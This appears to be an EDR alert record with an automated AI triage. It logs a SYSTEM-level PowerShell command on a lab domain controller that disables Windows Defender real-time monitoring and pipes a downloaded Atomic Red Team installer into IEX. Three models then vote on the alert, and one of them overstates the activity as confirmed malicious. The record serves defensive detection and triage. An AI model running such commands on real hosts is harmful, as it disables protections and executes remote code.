{
  "author": "_soteria-rules-edr-926e2197-189b-4d89-9675-c8993933dc9a[bulk][segment]",
  "cat": "00088-WIN-Set-MpPreference_Disabled",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs ; Invoke-AtomicTest T1039 -GetPrereqs ; Invoke-AtomicTest T1039 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 249815040,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4575232,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8460,
        "THIS_ATOM": "c896e11e93fdfcc580e177e469c2a841",
        "THREADS": 3,
        "TIMESTAMP": 1774364737221,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8460,
      "PROCESS_ID": 9156,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
      "event_time": 1774364737793,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3799,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "c896e11e93fdfcc580e177e469c2a841",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "20e47fdec03e5cfc9f50dea369c2a844"
    }
  },
  "detect_id": "6888c1e1-7619-4ca8-9d92-542969c2a845",
  "detect_mtd": {
    "description": "Set-MpPreference is a powershell commandlet that configures preferences for Windows Defender scans and updates. This detector looks for Set-MpPreference commandlet supplied with the disable flag.",
    "falsepositives": [
      "This should always be considered suspicious as this is indicating an attempt to disable the AV on the system in question."
    ],
    "references": [
      "https://meterpreter.org/the-latest-trickbot-variant-with-stealthy-code-injection-trick-appear/",
      "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/"
    ],
    "tags": [
      "attack.t1562.001",
      "attack.t1059.001"
    ]
  },
  "gen_time": 1774364741593,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364737\u0026selected=20e47fdec03e5cfc9f50dea369c2a844",
  "namespace": "general",
  "priority": 3,
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
    "event_time": 1774364737793,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3799,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "c896e11e93fdfcc580e177e469c2a841",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "20e47fdec03e5cfc9f50dea369c2a844"
  },
  "rule_tags": [
    "ext:soteria-rules-edr",
    "attack.t1059.001",
    "attack.t1562.001"
  ],
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "service.WIN-Set-MpPreference_Disabled",
  "ts": 1774364741000
}

{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}

{
  "confidence": 0.883,
  "false_positive_reason": null,
  "investigation_questions": [
    "Who initiated the execution of the batch file in C:\\Windows\\TEMP?",
    "Is the hostname associated with a security researcher or a testing environment?",
    "Are there any network connections to GitHub or other external repositories following this event?"
  ],
  "ioc_analysis": "The primary IOC is the PowerShell command line which explicitly disables security controls and downloads scripts from a public GitHub repository (Red Canary ART). The process is running as NT AUTHORITY\\SYSTEM from a batch file in C:\\Windows\\TEMP, which is a common pattern for both automated testing and malicious lateral movement/execution.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1",
    "C:\\Windows\\TEMP\\pld9B56.tmp.bat",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c"
  ],
  "mitre_techniques": [
    "T1562.001",
    "T1059.001",
    "T1039",
    "T1105"
  ],
  "recommended_actions": [
    "Manual analyst review required \u2014 AI models (majority)",
    "Verify if an authorized security assessment or automated testing was scheduled for this host.",
    "Immediately re-enable Windows Defender Real-time Monitoring if the test was not authorized.",
    "Audit the host for any other unauthorized security testing tools or artifacts.",
    "Review the source of the batch file \u0027pld9B56.tmp.bat\u0027 in the TEMP directory."
  ],
  "risk_score": 92,
  "severity": "high",
  "summary": "**Vote: MAJORITY (2/3 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\n**Verdict:** true_positive | **Confidence:** 1.0\nThis detection identifies a PowerShell process executing a command to disable Windows Defender Real-time Monitoring (\u0027Set-MpPreference -DisableRealtimeMonitoring $true\u0027). The activity is part of an automated deployment and execution of the Atomic Red Team (ART) testing framework, specifically invoking test T1039 (Data from Network Shared Drive).\n\n**IOC Analysis:** The primary IOC is the PowerShell command line which explicitly disables security controls and downloads scripts from a public GitHub repository (Red Canary ART). The process is running as NT AUTHORITY\\SYSTEM from a batch file in C:\\Windows\\TEMP, which is a common pattern for both automated testing and malicious lateral movement/execution.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of PowerShell scripts designed to disable Windows Defender real-time protection and deploy the Atomic Red Team (ART) framework. The command line explicitly contains IEX (Invoke-Expression) with a remote URL from GitHub, which is a classic indicator of malware delivery or credential theft.\n\n**IOC Analysis:** The process path C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe is legitimate, but the command line arguments are highly suspicious and malicious. The script disables real-time monitoring (Set-MpPreference), bypasses security protocols ([Net.ServicePointManager]), and executes remote code via IEX from a raw.githubusercontent.com URL. This matches known ART deployment patterns used by threat actors to establish persistence and evade detection.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** suspicious | **Confidence:** 0.7\nThe detection involves a PowerShell process running as SYSTEM with commands that disable Windows Defender real-time monitoring and install Atomic Red Team modules, indicating a potential attempt to bypass security and execute malicious scripts.\n\n**IOC Analysis:** The FILE_PATH is a legitimate PowerShell executable in C:\\Windows\\System32, which is a known-good location, and it is signed. However, the command line shows suspicious activities, including disabling security monitoring and downloading/installing tools from GitHub, which could be part of an attack. The hash is Microsoft-signed, but the behavior suggests malicious intent.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "manual_review",
    "mode": "majority",
    "total_models": 3,
    "vote_summary": [
      "gemini-cli: true_positive (critical, 100% confidence)",
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: suspicious (high, 70% confidence)"
    ],
    "votes": [
      {
        "confidence": 1.0,
        "model": "gemini-cli",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.7,
        "model": "deepseek-r1:8b",
        "verdict": "suspicious"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}